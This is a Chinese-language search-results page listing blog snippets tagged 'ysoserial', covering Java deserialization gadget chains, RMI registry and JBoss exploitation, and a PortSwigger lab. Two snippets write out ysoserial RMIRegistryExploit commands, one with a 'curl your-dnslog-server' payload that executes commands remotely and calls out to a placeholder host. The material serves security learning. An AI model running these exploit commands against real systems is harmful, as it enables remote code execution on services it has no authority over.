搜索结果
查询Tags标签: ysoserial,共有 13条记录-
RMI拓展
版本要求: 从JDK8u21、7u13、6u141开始,JDK为RMI注册表和RMI分布式垃圾收集器内置了过滤器,只允许特定的类进行反序列化。Registry无法成功攻击RMI。 漏洞复现过程: 1.启动RMI注册机制 java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1088 C…
2022/3/7 6:16:57 人评论 次浏览 -
中间件漏洞 -- JBoss
中间件漏洞记录--5jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑…
2021/11/17 23:44:03 人评论 次浏览 -
中间件漏洞 -- JBoss
中间件漏洞记录--5jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑…
2021/11/17 23:44:03 人评论 次浏览 -
Ysoserial Commons Collections6分析
Ysoserial Commons Collections6分析 写在前面CommonsCollections Gadget Chains CommonsCollection Version JDK Version NoteCommonsCollections1 CommonsCollections 3.1 - 3.2.1 1.7 (8u71之后已修复不可利用)CommonsCollections2 CommonsCollections 4.0 暂无限制 …
2021/10/18 6:12:31 人评论 次浏览 -
Ysoserial Commons Collections6分析
Ysoserial Commons Collections6分析 写在前面CommonsCollections Gadget Chains CommonsCollection Version JDK Version NoteCommonsCollections1 CommonsCollections 3.1 - 3.2.1 1.7 (8u71之后已修复不可利用)CommonsCollections2 CommonsCollections 4.0 暂无限制 …
2021/10/18 6:12:31 人评论 次浏览 -
java安全——ysoserial工具URLDNS链分析
本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任…
2021/9/8 11:06:09 人评论 次浏览 -
java安全——ysoserial工具URLDNS链分析
本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任…
2021/9/8 11:06:09 人评论 次浏览 -
Lab: Exploiting Java deserialization with Apache Commons:使用 Apache Commons 开发的 Java 反序列化(ysoserial的使
靶场内容 本实验使用基于序列化的会话机制并加载 Apache Commons Collections 库。尽管您没有源代码访问权限,但您仍然可以使用预先构建的小工具链来利用此实验室。 为了解决实验室问题,请使用第三方工具生成包含远程代码执行负载的恶意序列化对象。然后,将此对象传递到…
2021/8/23 12:05:41 人评论 次浏览 -
Lab: Exploiting Java deserialization with Apache Commons:使用 Apache Commons 开发的 Java 反序列化(ysoserial的使
靶场内容 本实验使用基于序列化的会话机制并加载 Apache Commons Collections 库。尽管您没有源代码访问权限,但您仍然可以使用预先构建的小工具链来利用此实验室。 为了解决实验室问题,请使用第三方工具生成包含远程代码执行负载的恶意序列化对象。然后,将此对象传递到…
2021/8/23 12:05:41 人评论 次浏览 -
ysoserial CommonsColletions5分析
我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写。 所以要挖掘出一条能替代的类BadAttributeValueExpException 在CC5中除了有一个新的类BadAttributeValueExpException外,还有一个新的类TiedMapEntry,用来调用LazyMap的get方法…
2021/7/11 6:07:44 人评论 次浏览 -
ysoserial CommonsColletions5分析
我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写。 所以要挖掘出一条能替代的类BadAttributeValueExpException 在CC5中除了有一个新的类BadAttributeValueExpException外,还有一个新的类TiedMapEntry,用来调用LazyMap的get方法…
2021/7/11 6:07:44 人评论 次浏览 -
Java RMI Registry 反序列化漏洞(<=jdk8u111)
漏洞复现 先去这http://www.dnslog.cn/搞个dns 然后用这个命令: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"然后刷新dnslog 好兄弟们你们看懂了吗?反正我…
2021/7/3 12:21:51 人评论 次浏览 -
认识一下ysoserial的AspectJWeaver
前言 AntCTFxD^3CTF 中学到了很多,参照大佬的文章也跟着分析一下ysoserial中的AspectJWeaver 基础部分 ysoserial中的AspectJWeaver : 此gadget用于写文件 Java的File类相关知识 File.separator表示目录分隔符/或者\,根据系统判断 HashSet HashSet 实现原理简述 : HashMa…
2021/4/13 20:25:50 人评论 次浏览
